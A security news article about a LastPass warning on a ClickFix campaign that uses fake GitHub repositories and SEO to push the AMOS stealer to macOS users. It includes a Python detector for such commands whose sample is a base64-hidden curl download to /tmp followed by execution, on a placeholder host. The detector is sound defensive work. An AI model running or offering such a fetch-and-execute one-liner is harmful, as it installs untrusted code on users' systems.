LastPass is warning users of a campaign that targets macOS users with malicious software impersonating popular products delivered through fraudulent GitHub repositories.
The fake apps deliver the Atomic (AMOS) info-stealing malware in ClickFix attacks, and are promoted through search engine optimization (SEO) tactics on Google and Bing.
AMOS is a malware-as-a-service operation available for $1,000/month that typically targets data on infected machines.
Recently, the developers of the malware added a backdoor component, giving attackers persistent, stealthy access to compromised systems.
LastPass says that apart from its product, the campaign impersonates more than 100 software solutions, like 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne.
Malicious Google Search result
Source: LastPass
The attackers created a large number of deceptive GitHub repositories from multiple accounts to evade takedown and optimize them to rank high in search results.
GitHub repository claiming affiliation with LastPass
Source: LastPass
These repositories feature a “download button” that directs visitors to a secondary site, where they are prompted to paste a command into the Terminal to perform the installation.
Page hosting the ClickFix instructions
Source: LastPass
This is a typical ‘ClickFix’ attack that takes advantage of the victim not understanding what the command does on their system.
The command performs a curl request to a base64-encoded URL and downloads an AMOS payload (install.sh) to the /tmp directory.
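As an added illustration (not code from LastPass or BleepingComputer), the small Python checker below looks for the traits just described in a pasted one-liner: a base64-hidden URL, a curl/wget download, a file dropped in /tmp and its execution. The sample command and the example.invalid URL are constructed for the demo and never resolve.

```python
import base64
import binascii
import re

# Heuristics for the pattern described above: a pasted one-liner that hides
# a URL in base64, fetches it with curl, drops a script in /tmp and runs it.
PATTERNS = {
    "base64-decode": re.compile(r"base64\s+(-d|--decode|-D)\b"),
    "downloader":    re.compile(r"\b(curl|wget)\b"),
    "drops-in-tmp":  re.compile(r"/tmp/[\w.\-]+"),
    "executes":      re.compile(r"(\b(sh|bash|zsh)\s+\S+|chmod\s+\+x|\|\s*(sh|bash)\b)"),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decode_hidden_urls(cmd):
    """Return any http(s) URLs hidden inside base64 literals in the command."""
    urls = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64 or not text: ignore the token
        if text.isprintable() and text.startswith(("http://", "https://")):
            urls.append(text)
    return urls

def analyze(cmd):
    """Score a pasted shell command: a 'what does this actually do?' check."""
    hits = [name for name, rx in PATTERNS.items() if rx.search(cmd)]
    urls = decode_hidden_urls(cmd)
    if urls:
        hits.append("hidden-url")
    verdict = "high" if len(hits) >= 3 else "medium" if hits else "low"
    return {"indicators": hits, "decoded_urls": urls, "verdict": verdict}

# Constructed sample (not an indicator from the campaign); the host is a
# reserved .invalid name, so the sample can never reach a real server.
_HIDDEN = base64.b64encode(b"https://example.invalid/install.sh").decode()
SAMPLE = (f'echo "{_HIDDEN}" | base64 -d | xargs curl -fsSL -o /tmp/install.sh '
          '&& chmod +x /tmp/install.sh && sh /tmp/install.sh')

if __name__ == "__main__":
    print(analyze(SAMPLE))
```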
ClickFix attacks targeting Apple computers aren’t rare. BleepingComputer previously reported about similar campaigns impersonating Booking.com, and, more recently, one that used ads to promote fake solutions to macOS-specific problems.
Although LastPass continues to monitor this campaign and reports fake repositories to GitHub, new ones can be easily created through automation from new accounts.
To avoid falling for ClickFix attacks, users should be cautious about running commands they do not understand on their systems.
When looking for software online, it is recommended to trust the official website of the vendor or project. If a macOS version isn’t available there, chances are an unofficial variant is fake.
In the case of a macOS port, users should make sure that it comes from a reputable vendor that has been vetted by the community.